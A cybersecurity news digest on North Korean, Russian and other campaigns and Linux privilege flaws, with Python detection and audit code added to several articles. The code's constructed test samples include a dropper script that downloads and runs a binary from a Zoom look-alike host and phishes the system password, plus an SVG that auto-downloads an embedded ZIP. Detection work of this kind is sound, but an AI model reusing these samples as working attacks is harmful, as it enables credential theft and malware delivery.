Category: Cybersecurity

  • BlueNoroff Deepfake Zoom Scam Hits Crypto Employee with MacOS Backdoor Malware


    The North Korea-aligned threat actor known as BlueNoroff has been observed targeting an employee in the Web3 sector with deceptive Zoom calls featuring deepfaked company executives to trick them into installing malware on their Apple macOS devices.

    Huntress, which revealed details of the cyber intrusion, said the attack targeted an unnamed cryptocurrency foundation employee, who received a message from an external contact on Telegram.

    “The message requested time to speak to the employee, and the attacker sent a Calendly link to set up a meeting time,” security researchers Alden Schmidt, Stuart Ashenbrenner, and Jonathan Semon said. “The Calendly link was for a Google Meet event, but when clicked, the URL redirects the end user to a fake Zoom domain controlled by the threat actor.”

    After several weeks, the employee is said to have joined a group Zoom meeting that included several deepfakes of known members of the senior leadership of their company, along with other external contacts.

    However, when the employee said they were unable to use their microphone, the synthetic personas urged them to download and install a Zoom extension to address the supposed issue. The link to the extension, shared via Telegram, downloaded an AppleScript that went by the name “zoom_sdk_support.scpt.”

    This AppleScript first opens a legitimate webpage for the Zoom software development kit (SDK) as a decoy, but is also configured to stealthily download a next-stage payload from a remote server (“support[.]us05web-zoom[.]biz”) and execute it as a shell script.

    The script begins by disabling bash history logging and then checks whether Rosetta 2 is installed on the compromised Mac, installing it if not. Rosetta 2 is Apple's translation layer that lets Macs with Apple silicon run binaries built for Intel-based Macs (x86_64), so installing it is a prerequisite for running x86_64 payloads on an Apple silicon host.


    The script then creates a hidden file called “.pwd,” downloads a binary from the Zoom look-alike domain (“web071zoom[.]us/fix/audio-fv/7217417464”) to “/tmp/icloud_helper,” and makes a second request to “web071zoom[.]us/fix/audio-tr/7217417464” to fetch another, unspecified payload.

    The shell script also prompts the user for their system password and wipes the shell's command history to avoid leaving a forensic trail. Huntress said its investigation led to the discovery of eight distinct malicious binaries on the victim host –

    • Telegram 2, a Nim-based binary responsible for starting the primary backdoor
    • Root Troy V4, a fully-featured Go backdoor that’s used to run remote AppleScript payloads, shell commands, and download additional malware and execute them
    • InjectWithDyld, a C++ binary loader downloaded by Root Troy V4, which, in turn, drops two more payloads: A benign Swift application to facilitate process injection and a different Nim implant that enables the operator to issue commands and receive responses asynchronously
    • XScreen, an Objective-C keylogger with features to monitor the victim’s keystrokes, clipboard, and the screen, and send the information to a command-and-control (C2) server
    • CryptoBot, a Go-based information stealer that can collect cryptocurrency related files from the host
    • NetChk, an almost empty binary that’s designed to generate random numbers forever
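    The dropper behaviour described above (history suppression, a Rosetta 2 install, a hidden file under the home directory, a download into /tmp, a password prompt, and a Zoom look-alike domain) is unusual enough in combination that a responder can score a recovered script on it. The following is an added example written for this page, not Huntress's tooling: SAMPLE_SCRIPT and BENIGN_SCRIPT are constructed to mirror the reported behaviour, and the exact form of the password prompt (an osascript dialog with a hidden answer) is an assumption.

```python
"""Heuristic triage of a macOS "support" shell script (added example, not Huntress code)."""
import re

# Constructed to mirror the behaviour reported above; not the real dropper.
SAMPLE_SCRIPT = r"""#!/bin/bash
unset HISTFILE
export HISTFILE=/dev/null
set +o history
if ! /usr/bin/pgrep -q oahd; then
  /usr/sbin/softwareupdate --install-rosetta --agree-to-license >/dev/null 2>&1
fi
touch "$HOME/.pwd"
curl -s -o /tmp/icloud_helper "https://web071zoom[.]us/fix/audio-fv/7217417464"
chmod +x /tmp/icloud_helper
PW=$(osascript -e 'display dialog "Zoom needs your password to fix audio" default answer "" with hidden answer' -e 'text returned of result')
echo "$PW" > "$HOME/.pwd"
/tmp/icloud_helper &
history -c
"""

# Constructed benign counterpart: collects Zoom logs for a support ticket.
BENIGN_SCRIPT = r"""#!/bin/bash
set -e
mkdir -p "$HOME/Library/Logs/ZoomSupport"
/usr/bin/log show --last 10m --predicate 'process == "zoom.us"' > "$HOME/Library/Logs/ZoomSupport/audio.log"
"""

# (name, pattern, weight). Weights reflect how rarely a legitimate support script does this.
INDICATORS = [
    ("history_disabled", re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history|history\s+-c"), 2),
    ("rosetta_install", re.compile(r"softwareupdate\s+--install-rosetta"), 1),
    ("hidden_home_file", re.compile(r"\$HOME/\.[A-Za-z0-9_]+|~/\.[A-Za-z0-9_]+"), 1),
    ("download_to_tmp", re.compile(r"curl\b[^\n]*-o\s+/tmp/\S+|wget\b[^\n]*-O\s+/tmp/\S+"), 2),
    ("exec_from_tmp", re.compile(r"chmod\s+\+x\s+/tmp/\S+|(^|\s)/tmp/\S+\s*&?$", re.M), 2),
    ("password_prompt", re.compile(r"with hidden answer|read\s+-s\b"), 3),
]
URL_HOST = re.compile(r"https?://([^\s/\"']+)")


def triage_script(text: str) -> dict:
    """Score a shell script; returns the matched indicators and a coarse verdict."""
    hits, score = [], 0
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    # Any host that contains "zoom" but is not zoom.us or a subdomain of it is a look-alike.
    for host in URL_HOST.findall(text):
        host = host.replace("[.]", ".").lower()  # undo defanging if present
        if "zoom" in host and host != "zoom.us" and not host.endswith(".zoom.us"):
            hits.append("lookalike_zoom_domain")
            score += 2
            break
    verdict = "malicious" if score >= 6 else "suspicious" if score >= 3 else "benign"
    return {"score": score, "indicators": hits, "verdict": verdict}


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, triage_script(script))
```

    The thresholds are deliberately coarse; the point is that no single indicator is damning (plenty of installers touch /tmp), but a password prompt combined with history suppression and a look-alike domain is.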

    BlueNoroff, also tracked under the names Alluring Pisces, APT38, Black Alicanto, Copernicium, Nickel Gladstone, Stardust Chollima, and TA444, is a sub-cluster within the Lazarus Group with a history of striking financial institutions, cryptocurrency businesses, and ATMs for monetary gain, generating revenue for the Democratic People's Republic of Korea (DPRK).

    The group is best known for the TraderTraitor campaign, a series of cryptocurrency heists in which employees of organizations engaged in blockchain research are targeted with malicious cryptocurrency trading applications. Notable cases include the Bybit hack in February 2025 and the Axie Infinity hack in March 2022.

    “Remote workers, especially in high-risk areas of work, are often the ideal targets for groups like TA444,” Huntress said. “It is important to train employees to identify common attacks that start off with social engineering related to remote meeting software.”

    According to DTEX’s latest assessment of North Korea’s cyber structure, the APT38 mission likely no longer exists and has fractured into TraderTraitor (aka Jade Sleet and UNC4899) and CryptoCore (aka CageyChameleon, CryptoMimic, DangerousPassword, LeeryTurtle, and Sapphire Sleet), with the new clusters becoming the new faces of financial theft for the regime.

    “TraderTraitor is arguably the most prolific of any of the DPRK APT groups when it comes to cryptocurrency theft and seems to have housed the most talent from the original APT38 effort,” DTEX said. “CryptoCore has been active since at least 2018, likely splitting out of APT38 with TraderTraitor.”

    What's more, the use of audio-issue lures to trick prospective victims into compromising their own machines echoes an evolution of another North Korea-linked campaign, Contagious Interview, which uses ClickFix-style alerts to deliver a malware family named GolangGhost.


    The new iteration, referred to as ClickFake Interview, revolves around creating fake job advertisements and duping applicants into copying and running a malicious command, under the pretext of fixing camera and microphone access, on a fake website the threat actors set up to host their hiring assessment.

    These cross-platform attacks, per Cisco Talos, have since evolved further, employing a Python version of GolangGhost that has been codenamed PylangGhost. The bogus assessment sites impersonate well-known financial entities such as Archblock, Coinbase, Robinhood, and Uniswap, and have been found to target a small set of users mainly located in India.

    “In recent campaigns, the threat actor Famous Chollima — potentially made up of multiple groups — has been using a Python-based version of their trojan to target Windows systems, while continuing to deploy a Golang-based version for MacOS users,” security researcher Vanja Svajcer said. “Linux users are not targeted in these latest campaigns.”

    PylangGhost, like its Golang counterpart, establishes contact with a C2 server to receive commands that enable the attackers to remotely control the infected machine, download/upload files, as well as steal cookies and credentials from over 80 browser extensions, including password managers and cryptocurrency wallets.

    “It is not clear […] why the threat actors decided to create two variants using a different programming language, or which was created first,” Talos remarked. “The structure, the naming conventions and the function names are very similar, which indicates that the developers of the different versions either worked closely together or are the same person.”

    Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Uncover LOTS Attacks Hiding in Trusted Tools — Learn How in This Free Expert Session


    Jun 19, 2025 | The Hacker News | Cybersecurity / Threat Hunting

    Most cyberattacks today don’t start with loud alarms or broken firewalls. They start quietly—inside tools and websites your business already trusts.

    It’s called “Living Off Trusted Sites” (LOTS)—and it’s the new favorite strategy of modern attackers. Instead of breaking in, they blend in.

    Hackers are using well-known platforms like Google, Microsoft, Dropbox, and Slack as launchpads. They hide malicious code inside routine traffic, making it incredibly difficult for traditional defenses to detect them.

    And here’s the scary part: many security teams don’t even realize it’s happening—until it’s too late.

    Why You’re Not Seeing These Attacks

    LOTS tactics don’t look suspicious at first glance. There’s no malware signature to flag, and no unusual IP address to trace. It’s legitimate traffic—until it’s not.

    Attackers are exploiting:

    • Common business tools like Teams, Zoom, and GitHub
    • Shortened or vanity URLs to redirect users
    • Trusted cloud services to host malicious payloads

    In short, they’re using your trust against you.

    What You’ll Learn in This Free Webinar

    Join Zscaler’s top threat hunters for “Threat Hunting Insights from the World’s Largest Security Cloud“—a must-attend webinar revealing how stealthy LOTS attacks are detected and stopped in real time. Get frontline tactics to outsmart threats hiding in trusted tools.

    You’ll discover:

    • 🔍 The latest LOTS attack techniques seen in real environments
    • 🛠️ How threat hunters caught stealthy attackers hiding inside “normal” traffic
    • 🚨 What trusted tools are being misused right now by threat actors
    • 🔐 Simple, proven ways to improve LOTS detection and reduce risk
    • 🔭 What’s coming next: trends shaping the future of stealth-based attacks

    This session is for anyone responsible for defending their organization—whether you’re a security leader trying to stay ahead of evolving threats, a threat hunter sharpening your detection skills, or part of an IT or SOC team overwhelmed by false positives and stealthy attacks. If your company relies on SaaS apps, cloud platforms, or collaborative tools, you’re already a target—and LOTS tactics are designed to slip past unnoticed.

    Watch this Webinar

    Attackers today aren’t trying to break in—they’re blending in. By hiding inside trusted tools and platforms, they bypass traditional defenses and operate in plain sight. This webinar gives you rare access to real-world detection stories and techniques from experts who analyze trillions of security signals every day inside the world’s largest inline security cloud.

    Reserve your seat now to gain exclusive frontline insights, proven tactics, and smarter strategies that could save your team hours—and stop attacks before they succeed.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Russian APT29 Exploits Gmail App Passwords to Bypass 2FA in Targeted Phishing Campaign


    Jun 19, 2025 | Ravie Lakshmanan | Email Security / Identity Protection

    Threat actors with suspected ties to Russia have been observed taking advantage of a Google account feature called application specific passwords (or app passwords) as part of a novel social engineering tactic designed to gain access to victims’ emails.

    Details of the highly targeted campaign were disclosed by Google Threat Intelligence Group (GTIG) and the Citizen Lab, stating the activity seeks to impersonate the U.S. Department of State.

    “From at least April through early June 2025, this actor targeted prominent academics and critics of Russia, often using extensive rapport building and tailored lures to convince the target to set up application specific passwords (ASPs),” GTIG researchers Gabby Roncone and Wesley Shields said.

    “Once the target shares the ASP passcode, the attackers establish persistent access to the victim’s mailbox.”


    The activity has been attributed by Google to a threat cluster it tracks as UNC6293, which it says is likely affiliated with the Russian state-sponsored hacking group called APT29 (aka BlueBravo, Cloaked Ursa, CozyLarch, Cozy Bear, ICECAP, Midnight Blizzard, and The Dukes).

    The social engineering unfolds over a span of several weeks to establish rapport with targets, rather than induce a sense of pressure or urgency that may have otherwise raised suspicion.

    This involves sending benign-looking phishing emails disguised as meeting invitations that carry no fewer than four fictitious “@state.gov” addresses in the CC line to lend them a veneer of credibility.

    “A target might reason ‘if this isn’t legitimate, surely one of these State Department employees would say something, especially if I reply and keep them on the CC line,’” the Citizen Lab said.

    “We believe that the attacker is aware that the State Department’s email server is apparently configured to accept all messages and does not emit a ‘bounce’ response even when the address does not exist.”

    This indicates that the attacks are meticulously planned and executed to trick victims into handing over a 16-character passcode that grants the adversary access to their mailbox, under the pretext of enabling “secure communications between internal employees and external partners.”

    Google describes app passwords as a way to give a less secure app or device access to a Google account that has two-factor authentication (2FA) enabled. Because the app password is presented in place of the normal password and second-factor challenge, anyone holding it can sign in to the mailbox from a mail client without ever being prompted for 2FA, which is exactly what makes it worth stealing.

    “When you use 2-Step Verification, some less secure apps or devices may be blocked from accessing your Google account,” per the company. “App passwords are a way to let the blocked app or device access your Google account.”

    The initial messages are designed to elicit a response from the target to set up a meeting, after which they are sent a PDF document that lists a series of steps to create an app password in order to securely access a fake Department of State cloud environment and share the code with them.

    “The attackers then set up a mail client to use the ASP, likely with the end goal of accessing and reading the victim’s email correspondence,” GTIG said. “This method also allows the attackers to have persistent access to accounts.”
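    Because a social-engineered ASP looks, from the account's side, like any other legitimately enrolled mail client, the defensive check is an inventory review: which app passwords were created recently, which carry a name that matches the lure, and which have never been used by a real client. The block below is an added example, not Google's or GTIG's tooling. It works on a list of records in the shape that the Admin SDK Directory API's asps.list returns (codeId, name, creationTime and lastTimeUsed as epoch milliseconds); that shape is an assumption to verify against your own tenant's output, and SAMPLE_ASPS is constructed.

```python
"""Audit Google Workspace app passwords (ASPs) for freshly enrolled, lure-named entries.

Added example, not Google or GTIG tooling. Record shape mirrors Admin SDK
Directory API asps.list output (assumption; check against your tenant).
"""
from datetime import datetime, timedelta, timezone

# Constructed sample of asps.list records gathered across users.
SAMPLE_ASPS = [
    {"userKey": "alice@example.org", "codeId": 1, "name": "Thunderbird on laptop",
     "creationTime": "1700000000000", "lastTimeUsed": "1749000000000"},
    {"userKey": "alice@example.org", "codeId": 2, "name": "State Dept secure access",
     "creationTime": "1749200000000", "lastTimeUsed": "1749300000000"},
    {"userKey": "bob@example.org", "codeId": 3, "name": "Outlook",
     "creationTime": "1748900000000", "lastTimeUsed": "0"},
]

# Fixed "now" so the example is reproducible; use datetime.now(timezone.utc) in practice.
NOW = datetime(2025, 6, 10, tzinfo=timezone.utc)

# Words that recur in the lure described above; extend with your own themes.
LURE_WORDS = ("state", "department", "gov", "secure", "partner", "cloud")


def _ms_to_dt(ms):
    return datetime.fromtimestamp(int(ms) / 1000, tz=timezone.utc)


def audit_asps(asps, now=NOW, recent_days=30):
    """Return findings for ASPs that look like the product of social engineering:
    created inside the review window, named after the lure, or never used."""
    cutoff = now - timedelta(days=recent_days)
    findings = []
    for asp in asps:
        created = _ms_to_dt(asp["creationTime"])
        last_used = int(asp.get("lastTimeUsed") or 0)  # 0 means never used
        reasons = []
        if created >= cutoff:
            reasons.append("created_recently")
            if any(word in asp["name"].lower() for word in LURE_WORDS):
                reasons.append("lure_like_name")
            if last_used == 0:
                reasons.append("never_used")
        if reasons:
            findings.append({
                "user": asp["userKey"],
                "codeId": asp["codeId"],
                "name": asp["name"],
                "created": created.isoformat(),
                "severity": "high" if "lure_like_name" in reasons else "medium",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_asps(SAMPLE_ASPS):
        print(finding)
```

    A finding is a prompt to call the user, not proof of compromise; if the user does not recognise the entry, revoke it (the Directory API exposes a delete operation for ASPs) and review the mailbox for forwarding rules and sign-ins from residential proxy ranges, the access pattern Google reports above.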

    Google said it observed a second campaign bearing Ukrainian themes, and that the attackers logged into victim accounts mainly using residential proxies and VPS servers to evade detection. The company said it has since taken steps to secure the accounts compromised by the campaigns.


    UNC6293’s ties to APT29 stem from a series of similar social engineering attacks that have leveraged novel techniques like device code phishing and device join phishing to gain unauthorized access to Microsoft 365 accounts since the start of the year.

    Device join phishing is particularly noteworthy for the fact that it tricks victims into sending back to the attackers a Microsoft-generated OAuth code to hijack their accounts.

    “Since April 2025, Microsoft has observed suspected Russian-linked threat actors using third-party application messages or emails referencing upcoming meeting invitations to deliver a malicious link containing valid authorization code,” Microsoft revealed last month.

    “When clicked, the link returns a token for the Device Registration Service, allowing registration of the threat actor’s device to the tenant.”



    Source: thehackernews.com…

  • Meta Adds Passkey Login Support to Facebook for Android and iOS Users


    Jun 19, 2025 | Ravie Lakshmanan | Mobile Security / Passwordless

    Meta Platforms on Wednesday announced that it’s adding support for passkeys, the next-generation password standard, on Facebook.

    “Passkeys are a new way to verify your identity and login to your account that’s easier and more secure than traditional passwords,” the tech giant said in a post.

    Support for passkeys is expected to be available “soon” on Android and iOS mobile devices. The feature is also coming to its Messenger platform in the coming months.

    The company said passkeys can also be used to auto-fill payment information when making purchases using Meta Pay.


    Meta previously rolled out passkeys support for WhatsApp on Android in October 2023, and on iOS a few months later in April 2024. There is no word yet on when it plans to bring passkeys to Instagram.

    Passkeys, backed by the FIDO Alliance, are a passwordless authentication solution that lets users sign in to online services with biometrics or the device's lock PIN. The private key never leaves the device and the credential is bound to the site's origin, which is what makes it resistant to phishing.

    “Passkeys are an upgrade in security compared to traditional passwords and one-time SMS codes because they are resistant to guessing or theft by malicious websites or scam links, making them effective against phishing and password spraying attacks,” Meta said.

    Last month, Microsoft made passkeys the default sign-in method for new consumer accounts. More recently, Apple previewed upcoming changes to its Passwords app that allows users to import and export passkeys between participating credential manager apps across iOS, iPadOS, macOS, and visionOS 26.



    Source: thehackernews.com…

  • New Linux Flaws Enable Full Root Access via PAM and Udisks Across Major Distributions


    Jun 19, 2025 | Ravie Lakshmanan | Linux / Vulnerability

    Cybersecurity researchers have uncovered two local privilege escalation (LPE) flaws that could be exploited to gain root privileges on machines running major Linux distributions.

    The vulnerabilities, discovered by Qualys, are listed below –

    • CVE-2025-6018 – LPE from unprivileged to allow_active in SUSE 15’s Pluggable Authentication Modules (PAM)
    • CVE-2025-6019 – LPE from allow_active to root in libblockdev via the udisks daemon

    “These modern ‘local-to-root’ exploits have collapsed the gap between an ordinary logged-in user and a full system takeover,” Saeed Abbasi, Senior Manager at Qualys Threat Research Unit (TRU), said.


    “By chaining legitimate services such as udisks loop-mounts and PAM/environment quirks, attackers who own any active GUI or SSH session can vault across polkit’s allow_active trust zone and emerge as root in seconds.”

    The cybersecurity company said CVE-2025-6018 is present in the PAM configuration of openSUSE Leap 15 and SUSE Linux Enterprise 15, enabling an unprivileged local attacker to elevate to the “allow_active” user and call Polkit actions that are otherwise reserved for a physically present user.

    CVE-2025-6019, on the other hand, affects libblockdev and is exploitable via the udisks daemon, which is included by default on most Linux distributions. It permits an “allow_active” user to gain full root privileges; chained with CVE-2025-6018, which supplies the allow_active status in the first place, an ordinary unprivileged local user can go all the way to root.

    “Although it nominally requires ‘allow_active’ privileges, udisks ships by default on almost all Linux distributions, so nearly any system is vulnerable,” Abbasi added. “Techniques to gain ‘allow_active,’ including the PAM issue disclosed here, further negate that barrier.”

    Once root privileges are obtained, an attacker has carte blanche on the system and can use it as a springboard for broader post-compromise actions, such as altering security controls and implanting backdoors for covert access.

    Qualys said it has developed proof-of-concept (PoC) exploits to confirm the presence of these vulnerabilities on various operating systems, including Ubuntu, Debian, Fedora, and openSUSE Leap 15.

    To mitigate the risk posed by these flaws, apply the patches provided by the Linux distribution vendors. As a temporary workaround, the Polkit rule for the “org.freedesktop.udisks2.modify-device” action (local rules live under /etc/polkit-1/rules.d/) can be changed to require administrator authentication (“auth_admin”) rather than granting the action to active local sessions.

    Flaw Disclosed in Linux PAM

    The disclosure comes as maintainers of Linux PAM resolved a high-severity path traversal flaw (CVE-2025-6020, CVSS score: 7.8) that could also allow a local user to escalate to root privileges. The issue has been fixed in version 1.7.1.


    “The module pam_namespace in linux-pam <= 1.7.0 may access user-controlled paths without proper protections, which allows a local user to elevate their privileges to root via multiple symlink attacks and race conditions,” Linux PAM maintainer Dmitry V. Levin said.

    Linux systems are vulnerable if they use pam_namespace to set up polyinstantiated directories for which the path to either the polyinstantiated directory or instance directory is under user-control. As workarounds for CVE-2025-6020, users can disable pam_namespace or ensure it does not operate on user-controlled paths.

    ANSSI's Olivier Bal-Petre, who reported the flaw to the maintainer on January 29, 2025, said users who do not use the namespace.init script provided by their distribution should also update their own copy to ensure that both paths are safe to operate on as root.



    Source: thehackernews.com…

  • New Malware Campaign Uses Cloudflare Tunnels to Deliver RATs via Phishing Chains


    A new campaign is making use of Cloudflare Tunnel subdomains to host malicious payloads and deliver them via malicious attachments embedded in phishing emails.

    The ongoing campaign has been codenamed SERPENTINE#CLOUD by Securonix.

    It leverages “the Cloudflare Tunnel infrastructure and Python-based loaders to deliver memory-injected payloads through a chain of shortcut files and obfuscated scripts,” security researcher Tim Peck said in a report shared with The Hacker News.

    The attack starts with sending payment- or invoice-themed phishing emails bearing a link to a zipped document that contains a Windows shortcut (LNK) file. These shortcuts are disguised as documents to trick victims into opening them, effectively activating the infection sequence.

    The elaborate multi-step process culminates in the execution of a Python-based shellcode loader that executes payloads packed with the open-source Donut loader entirely in memory.

    Securonix said the campaign has targeted the United States, United Kingdom, Germany, and other regions across Europe and Asia. The identity of the threat actor(s) behind the campaign is presently unknown, although the cybersecurity company pointed out their English fluency.

    The threat activity cluster is also notable for its shifting initial access methods, pivoting from internet shortcut (URL) files to using LNK shortcut files masquerading as PDF documents. These payloads are then used to retrieve additional stages over WebDAV via the Cloudflare Tunnel subdomains.

    It’s worth noting that a variation of this campaign was previously documented by eSentire and Proofpoint last year, with the attacks paving the way for AsyncRAT, GuLoader, PureLogs Stealer, Remcos RAT, Venom RAT, and XWorm.


    Abusing TryCloudflare offers manifold advantages. Malicious actors have long used legitimate cloud service providers as a front for their operations, including payload delivery and command-and-control (C2) communication, precisely because it makes the traffic harder to detect.

    By using a reputable subdomain (“*.trycloudflare[.]com”) for nefarious ends, it makes it exceedingly tough for defenders to distinguish between harmful and benign activities, thereby allowing it to evade URL or domain-based blocking mechanisms.

    The infection starts when the LNK file is launched, causing it to download a next-stage payload, a Windows Script File (WSF), from a remote WebDAV share hosted on a Cloudflare Tunnel subdomain. The WSF file is then executed using cscript.exe without arousing the victim's suspicion.

    “This WSF file functions as a lightweight VBScript-based loader, designed to execute an external batch file from a second Cloudflare domain,” Peck said. “The ‘kiki.bat’ file serves as the main payload delivery script next in the series of stagers. Overall, it’s designed for stealth and persistence.”

    The primary responsibility of the batch script is to display a decoy PDF document, check for antivirus software, and download and execute Python payloads, which are then used to run Donut-packed payloads like AsyncRAT or Revenge RAT in memory.
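    The chain just described leaves a distinctive shape in process-creation telemetry: a script host whose command line points at a UNC path under a trycloudflare.com host (the WebDAV form is \\host@SSL\DavWWWRoot\...), a cmd.exe child running a batch file from a second such host, and a Python interpreter running from a non-standard location beneath them. The block below is an added example, not Securonix's detection content: EVENTS is a constructed, time-ordered sample in a simplified EDR-like shape (pid, ppid, image, cmd), and the subdomains and script names in it are placeholders.

```python
"""Flag the SERPENTINE#CLOUD-style process chain in process-creation events.

Added example, not Securonix detection content. EVENTS is constructed; the
event shape is a simplified stand-in for real EDR telemetry (assumption).
"""
import re

TRYCF = re.compile(r"trycloudflare\.com", re.I)
WEBDAV_UNC = re.compile(r"\\\\[^\\\s]+@SSL\\(DavWWWRoot\\)?", re.I)
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "mshta.exe"}
PYTHON_IMAGES = {"python.exe", "pythonw.exe"}
# Where a Python interpreter is expected to live on a managed Windows host (assumption).
EXPECTED_PYTHON_DIRS = ("c:\\program files", "\\appdata\\local\\programs\\python\\")

# Constructed, parent-before-child ordered sample; hostnames are placeholders.
EVENTS = [
    {"pid": 100, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c cscript.exe //nologo "\\quiet-lamp-1234.trycloudflare.com@SSL\DavWWWRoot\payment_details.wsf"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r'cscript.exe //nologo "\\quiet-lamp-1234.trycloudflare.com@SSL\DavWWWRoot\payment_details.wsf"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c "\\busy-river-9876.trycloudflare.com@SSL\DavWWWRoot\kiki.bat"'},
    {"pid": 500, "ppid": 400, "image": r"C:\Users\Public\Libraries\py\pythonw.exe",
     "cmd": r"pythonw.exe C:\Users\Public\Libraries\py\stage.py"},
    # Benign noise: an inventory script and a developer's pip invocation.
    {"pid": 600, "ppid": 50, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe //nologo C:\Scripts\inventory.vbs"},
    {"pid": 700, "ppid": 100, "image": r"C:\Program Files\Python312\python.exe",
     "cmd": "python.exe -m pip list"},
]


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _ancestors(by_pid, event):
    """Walk the ppid chain, guarding against pid reuse loops."""
    seen, parent = set(), event["ppid"]
    while parent in by_pid and parent not in seen:
        seen.add(parent)
        yield parent
        parent = by_pid[parent]["ppid"]


def detect(events):
    """Return one alert per process that matches a rule or descends from a match."""
    by_pid = {e["pid"]: e for e in events}
    flagged, alerts = set(), []
    for e in events:
        image, cmd, reasons = _basename(e["image"]), e["cmd"], []
        remote_webdav = bool(TRYCF.search(cmd) and WEBDAV_UNC.search(cmd))
        if remote_webdav:
            reasons.append("trycloudflare_webdav_in_cmdline")
        if image in SCRIPT_HOSTS and remote_webdav:
            reasons.append("script_host_from_remote_webdav")
        if image in PYTHON_IMAGES and not any(d in e["image"].lower() for d in EXPECTED_PYTHON_DIRS):
            reasons.append("python_from_unusual_path")
        if any(a in flagged for a in _ancestors(by_pid, e)):
            reasons.append("descends_from_flagged_chain")
        if reasons:
            flagged.add(e["pid"])
            alerts.append({"pid": e["pid"], "image": image, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

    The ancestry rule is what turns three individually weak signals into one incident: the Python loader alone looks like a user-installed interpreter, but a Python process whose grandparent is cscript.exe reading from a tunnel subdomain is the chain in the report.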

    Securonix said there is a possibility that the script may have been vibe-coded using a large language model owing to the presence of well-defined comments in the source code.

    “The SERPENTINE#CLOUD campaign is a complex and layered infection chain that blends a bit of social engineering, living-off-the-land techniques, and evasive in-memory code execution,” the company concluded. “The abuse of Cloudflare Tunnel infrastructure further complicates network visibility by giving the actor a disposable and encrypted transport layer for staging malicious files without maintaining traditional infrastructure.”

    Shadow Vector Targets Colombian Users via SVG Smuggling

    The disclosure comes as Acronis identified an active malware campaign dubbed Shadow Vector targeting users in Colombia using booby-trapped scalable vector graphics (SVG) files as the malware delivery vector in phishing emails that impersonate court notifications.

    “Attackers distributed spear-phishing emails impersonating trusted institutions in Colombia, delivering SVG decoys with embedded links to JS / VBS stagers hosted on public platforms, or password-protected ZIP files containing the payloads directly,” Acronis researchers Santiago Pontiroli, Jozsef Gegeny, and Ilia Dafchev said.

    The attacks led to the deployment of remote access trojans like AsyncRAT and Remcos RAT, with recent campaigns also utilizing a .NET loader associated with Katz Stealer. These attack chains involve hiding the payloads within Base64-encoded text of image files hosted on the Internet Archive.

    A noteworthy aspect of the campaign is the use of SVG smuggling techniques to deliver malicious ZIP archives through SVG files. These payloads are hosted on file-sharing services such as Bitbucket, Dropbox, Discord, and YDRAY. The downloaded archives contain both legitimate executables and malicious DLLs; the latter are sideloaded by the former to ultimately run the trojans.
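    An SVG is XML, so the smuggling variants described here (a script that decodes a Base64 blob into a Blob and clicks a download link, a data: URI carrying an archive, or a plain link out to a file-sharing host) can all be found with a static pass before the file ever reaches a browser. The following is an added example, not Acronis's detection logic: BENIGN_SVG and SMUGGLING_SVG are constructed, and the FILE_HOSTS list is an assumption built from the services named above.

```python
"""Static triage of SVG attachments for smuggling (added example, not Acronis tooling)."""
import base64
import binascii
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed samples; the lure text mirrors the court-notification theme above.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" fill="navy"/></svg>"""

ZIP_BLOB = base64.b64encode(b"PK\x03\x04" + bytes(400)).decode()  # ZIP magic plus padding

SMUGGLING_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<text x="10" y="20">Notificacion judicial - Rama Judicial</text>
<a xlink:href="https://bitbucket.org/example/notificacion/downloads/demanda.zip"><text x="10" y="40">Descargar</text></a>
<script><![CDATA[
var p = "{ZIP_BLOB}";
var bytes = Uint8Array.from(atob(p), c => c.charCodeAt(0));
var blob = new Blob([bytes], {{type: "application/zip"}});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob); a.download = "Demanda_Juzgado_17.zip"; a.click();
]]></script></svg>"""

SMUGGLING_API = re.compile(r"\b(atob|Blob|createObjectURL|msSaveOrOpenBlob|\.click|download)\b")
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
FILE_HOSTS = ("bitbucket.org", "dropbox.com", "discord.com", "discordapp.com", "ydray.com", "archive.org")  # assumption
MAGIC = {b"PK\x03\x04": "zip", b"MZ": "pe", b"\x7fELF": "elf", b"%PDF": "pdf"}


def _local(qname):
    """Strip an XML namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.split("}", 1)[-1]


def _sniff(b64text):
    """Decode a Base64 run and identify it by file magic; None if undecodable or unknown."""
    try:
        head = base64.b64decode(b64text)[:8]
    except (binascii.Error, ValueError):
        return None
    return next((kind for magic, kind in MAGIC.items() if head.startswith(magic)), None)


def _is_file_host(netloc):
    netloc = netloc.lower()
    return any(netloc == h or netloc.endswith("." + h) for h in FILE_HOSTS)


def analyze_svg(svg_text):
    root = ET.fromstring(svg_text)
    f = {"scripts": 0, "event_handlers": 0, "smuggling_apis": set(),
         "embedded_archives": [], "external_links": []}
    for el in root.iter():
        if _local(el.tag) == "script":
            f["scripts"] += 1
            body = el.text or ""  # CDATA content lands in .text
            f["smuggling_apis"].update(SMUGGLING_API.findall(body))
            for run in B64_RUN.findall(body):
                kind = _sniff(run)
                if kind:
                    f["embedded_archives"].append({"kind": kind, "source": "script", "b64_len": len(run)})
        for attr, value in el.attrib.items():
            name = _local(attr)
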